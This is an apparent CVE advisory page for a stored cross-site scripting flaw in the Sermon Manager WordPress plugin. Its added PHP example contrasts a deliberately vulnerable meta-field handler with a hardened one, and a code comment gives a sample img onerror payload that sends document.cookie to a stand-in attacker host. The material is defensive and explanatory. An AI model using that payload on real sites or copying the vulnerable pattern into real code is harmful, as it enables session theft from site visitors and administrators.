CVE-2025-63000
Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpforchurch Sermon Manager sermon-manager-for-wordpress allows Stored XSS. This issue affects Sermon Manager: from n/a through <= 2.30.0.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Stored XSS in Sermon Manager for WordPress up to 2.30.0 allows attackers with contributor+ roles to inject malicious scripts that execute when visitors view affected pages.
Vulnerability
Overview
CVE-2025-63000 is a stored cross-site scripting (XSS) vulnerability in the Sermon Manager plugin for WordPress (sermon-manager-for-wordpress), affecting all versions through 2.30.0 [1]. The flaw originates from improper neutralization of user-supplied input during web page generation, allowing malicious script content to be permanently stored on the server and executed in the browsers of site visitors [1].
Exploitation
Requirements
Exploitation requires an authenticated user with at least Contributor-level privileges (the 'Required Privilege' level noted in the advisory) [1]. The attacker then crafts a payload containing JavaScript, HTML, or other client-side code and submits it through a vulnerable field in the plugin's interface [1]. Because the injected script is stored on the server, it executes whenever any user, including administrators or anonymous visitors, later views the affected page; no social engineering of the victim is required [1].
Impact
A successful attack enables the adversary to execute arbitrary scripts in the context of the victim's browser session [1]. This can be used to steal session cookies, redirect users to phishing or malware-hosting sites, deface the website, or inject advertisements and other unwanted HTML content [1]. Because the script persists in the database, the attack can affect many users over time until the malicious content is removed or the plugin is secured.
Mitigation
The vendor has addressed this vulnerability in version 2.30.1 [1]. Users running Sermon Manager 2.30.0 or any earlier version are advised to update immediately [1]. For sites where an immediate update is not possible, consider disabling the plugin, restricting Contributor-level roles, or having a developer apply input sanitization until the patch can be deployed [1].
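The following is an added illustration of the vulnerability class described in the Exploitation and Mitigation sections above. It is not code from Sermon Manager, and the source does not identify which plugin field is affected, so the field name sermon_subtitle, the sermon_description field, the xss_demo_* function names and the shortcode are assumptions for the example. The WordPress API calls used (update_post_meta, get_post_meta, sanitize_text_field, wp_unslash, esc_html, wp_kses_post, wp_verify_nonce, current_user_can, add_action, add_shortcode) are the real core functions. The first half shows the store-raw, echo-raw pattern that lets a Contributor plant a script; the second half shows the same field with request verification, input sanitization and context-aware output escaping, which is the change a developer would apply as the interim mitigation.

```php
<?php
/*
 * Added illustration, not Sermon Manager's code: the CWE-79 pattern behind a
 * stored XSS in a WordPress plugin, using a hypothetical plain-text post meta
 * field 'sermon_subtitle' (assumed name) exposed on the post edit screen and
 * rendered by a shortcode. Contributors can create and edit their own posts,
 * so they reach the save path. The unfiltered_html check that WordPress
 * applies to post_content never touches custom meta: the plugin must filter.
 */

/* ----- Vulnerable pattern: raw store, raw echo ----- */

function xss_demo_save_subtitle_vulnerable( $post_id ) {
    // No nonce, no capability check, no sanitization: the request value is
    // persisted exactly as submitted.
    if ( isset( $_POST['sermon_subtitle'] ) ) {
        update_post_meta( $post_id, 'sermon_subtitle', $_POST['sermon_subtitle'] );
    }
}

function xss_demo_render_subtitle_vulnerable( $post_id ) {
    // The stored value is concatenated straight into the page markup.
    $subtitle = get_post_meta( $post_id, 'sermon_subtitle', true );
    return '<p class="sermon-subtitle">' . $subtitle . '</p>';
}
// A contributor who saves the subtitle
//   <img src=x onerror="fetch('https://attacker.invalid/?c='+document.cookie)">
// has that markup served to every viewer of the post, including an
// administrator who opens the pending post to review it.

/* ----- Hardened pattern: verify, sanitize on input, escape on output ----- */

function xss_demo_save_subtitle_hardened( $post_id ) {
    // The meta box must emit the matching field with
    // wp_nonce_field( 'xss_demo_save_' . $post->ID, 'xss_demo_nonce' ).
    // Reject requests without a valid nonce and users who may not edit this post.
    if ( ! isset( $_POST['xss_demo_nonce'] )
        || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['xss_demo_nonce'] ) ), 'xss_demo_save_' . $post_id )
        || ! current_user_can( 'edit_post', $post_id ) ) {
        return;
    }
    if ( ! isset( $_POST['sermon_subtitle'] ) ) {
        return;
    }
    // Plain-text field: strip all tags, invalid UTF-8 and line breaks before storing.
    $clean = sanitize_text_field( wp_unslash( $_POST['sermon_subtitle'] ) );
    update_post_meta( $post_id, 'sermon_subtitle', $clean );
}

function xss_demo_render_subtitle_hardened( $post_id ) {
    // Escape for the context the value lands in (an HTML text node). Output
    // escaping is the control that still holds if a value reached the database
    // through another write path, such as the REST API or an import.
    $subtitle = get_post_meta( $post_id, 'sermon_subtitle', true );
    return '<p class="sermon-subtitle">' . esc_html( $subtitle ) . '</p>';
}

// For a field that legitimately carries limited HTML (a description with <em>
// or <a>), use wp_kses_post() on save and on render instead of esc_html(): it
// keeps the tags allowed in post content and strips <script>, on* event
// handlers and javascript: URLs.
function xss_demo_save_description_hardened( $post_id ) {
    if ( ! isset( $_POST['xss_demo_nonce'], $_POST['sermon_description'] )
        || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['xss_demo_nonce'] ) ), 'xss_demo_save_' . $post_id )
        || ! current_user_can( 'edit_post', $post_id ) ) {
        return;
    }
    update_post_meta( $post_id, 'sermon_description', wp_kses_post( wp_unslash( $_POST['sermon_description'] ) ) );
}

// Wire only the hardened versions into WordPress.
add_action( 'save_post', 'xss_demo_save_subtitle_hardened' );
add_action( 'save_post', 'xss_demo_save_description_hardened' );
add_shortcode( 'xss_demo_subtitle', function ( $atts ) {
    return xss_demo_render_subtitle_hardened( get_the_ID() );
} );
```

Dropped into a test site as a small plugin, the vulnerable pair reproduces the advisory's scenario: a Contributor saves the payload as the subtitle, the post goes to Pending Review, and the script runs in the reviewing administrator's session. With the hardened pair in place the same submission is stored as inert text, and the esc_html() on output is the part that matters even if a future code path writes unsanitized data to the same meta key. If the value were instead placed inside an attribute, esc_attr() would be the right escaper; the rule is to escape for the exact context at the point of output.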
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: <=2.30.0
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.